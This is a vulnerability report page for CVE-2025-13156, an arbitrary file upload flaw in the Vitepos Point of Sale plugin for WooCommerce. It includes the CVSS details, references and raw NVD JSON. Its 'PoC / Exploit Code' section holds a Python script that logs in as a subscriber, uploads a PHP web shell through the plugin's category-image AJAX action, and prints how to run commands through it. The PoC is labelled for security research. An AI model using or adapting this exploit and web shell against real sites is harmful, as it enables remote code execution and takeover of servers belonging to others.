Security Vulnerability Report
CVE-2025-13156 CVSS 8.8 HIGH

CVE-2025-13156

Published: 2025-11-21 09:15:47
Last Modified: 2026-04-15 00:35:42

Description

The Vitepos – Point of Sale (POS) for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the insert_media_attachment() function in all versions up to, and including, 3.3.0. This is due to the save_update_category_img() function accepting user-supplied file types without validation when processing category images. This makes it possible for authenticated attackers, with subscriber level access and above, to upload arbitrary files on the affected site's server which makes remote code execution possible.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Vitepos – Point of Sale (POS) for WooCommerce <= 3.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13156 PoC - Vitepos arbitrary file upload
# Requires a WordPress subscriber-level account
import requests
import sys

target_url = "http://target-wordpress-site.com"
username = "attacker"
password = "password"

# 1. Log in to obtain the authentication cookie
login_url = f"{target_url}/wp-login.php"
session = requests.Session()
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In"
}
resp = session.post(login_url, data=login_data)
if "wordpress_logged_in" not in session.cookies.get_dict():
    print("[-] Login failed")
    sys.exit(1)
print("[+] Login successful")

# 2. Upload the malicious PHP file
upload_url = f"{target_url}/wp-admin/admin-ajax.php"
# PHP webshell
php_shell = b"<?php system($_GET['cmd']); ?>"
files = {
    "file": ("shell.php", php_shell, "application/x-php")
}
data = {
    "action": "vitepos_save_category_img",
    "_wpnonce": "bypass",
    "term_id": "1"
}
response = session.post(upload_url, data=data, files=files)
if response.status_code == 200:
    print("[+] File uploaded successfully")
    print(f"[*] Shell location: {target_url}/wp-content/uploads/vitepos/shell.php")
    print("[*] Execute command: ?cmd=whoami")
else:
    print("[-] Upload failed")
    print(response.text)

References

https://plugins.trac.wordpress.org/changeset/3398044
https://www.wordfence.com/threat-intel/vulnerabilities/id/bd478bb7-f0d7-4a29-8236-96ad69b5ae67?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13156",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-21T09:15:46.887",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Vitepos – Point of Sale (POS) for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the insert_media_attachment() function in all versions up to, and including, 3.3.0. This is due to the save_update_category_img() function accepting user-supplied file types without validation when processing category images. This makes it possible for authenticated attackers, with subscriber level access and above, to upload arbitrary files on the affected site's server which makes remote code execution possible."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-434"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3398044",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bd478bb7-f0d7-4a29-8236-96ad69b5ae67?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}